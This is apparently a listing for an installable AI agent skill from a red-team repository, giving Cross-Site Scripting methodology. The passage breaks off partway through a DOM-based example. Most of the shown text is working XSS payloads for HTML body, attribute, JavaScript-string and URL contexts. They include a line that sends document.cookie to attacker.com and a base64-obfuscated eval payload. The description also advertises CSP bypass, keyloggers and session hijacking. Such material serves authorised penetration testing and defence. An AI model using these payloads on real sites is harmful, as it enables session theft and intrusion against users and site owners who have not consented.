xsslisted

Cross-Site Scripting expert methodology covering reflected, stored, DOM-based, and mutation XSS. Includes CSP bypass, filter evasion, and post-exploitation (session hijacking, keyloggers, BeEF integration).
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63
Install: claude install-skill sunilgentyala/OmniRed
# Cross-Site Scripting (XSS)

## Attack Surface

Reflected: URL parameters, search fields, error messages, redirect parameters.

Stored: comments, profiles, names, addresses, any user-controlled content persisted and rendered to others.

DOM-based: JavaScript that reads from location.hash, document.referrer, location.search, postMessage without sanitisation.

## Methodology

### Phase 1 — Detection

```html
<script>alert(1)</script>
"><script>alert(1)</script>
'><script>alert(1)</script>
javascript:alert(1)
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
{{7*7}} -- template injection test alongside XSS
```

Track where your test string appears in the response. Identify the context:

- HTML body (tag injection)
- HTML attribute (attribute injection)
- JavaScript string (JS injection)
- JavaScript in `href`/`src` (URL context)

### Phase 2 — Context-specific payloads

**HTML body:**

```html
<script>alert(document.cookie)</script>
<img src=x onerror=fetch('//attacker.com/?c='+document.cookie)>
<svg/onload=eval(atob('YWxlcnQoZG9jdW1lbnQuY29va2llKQ=='))>
```

**HTML attribute:**

```html
" onmouseover="alert(1)
" onfocus="alert(1)" autofocus="
"><img src=x onerror=alert(1)>
```

**JavaScript string context:**

```javascript
'-alert(1)-'
\'-alert(1)//
`;alert(1)//
```

**href/src URL context:**

```
javascript:alert(1)
data:text/html,<script>alert(1)</script>
```

**DOM-based (source: location.hash):**

```
http://target/#"><img src=x onerror=alert(1)>
http://target/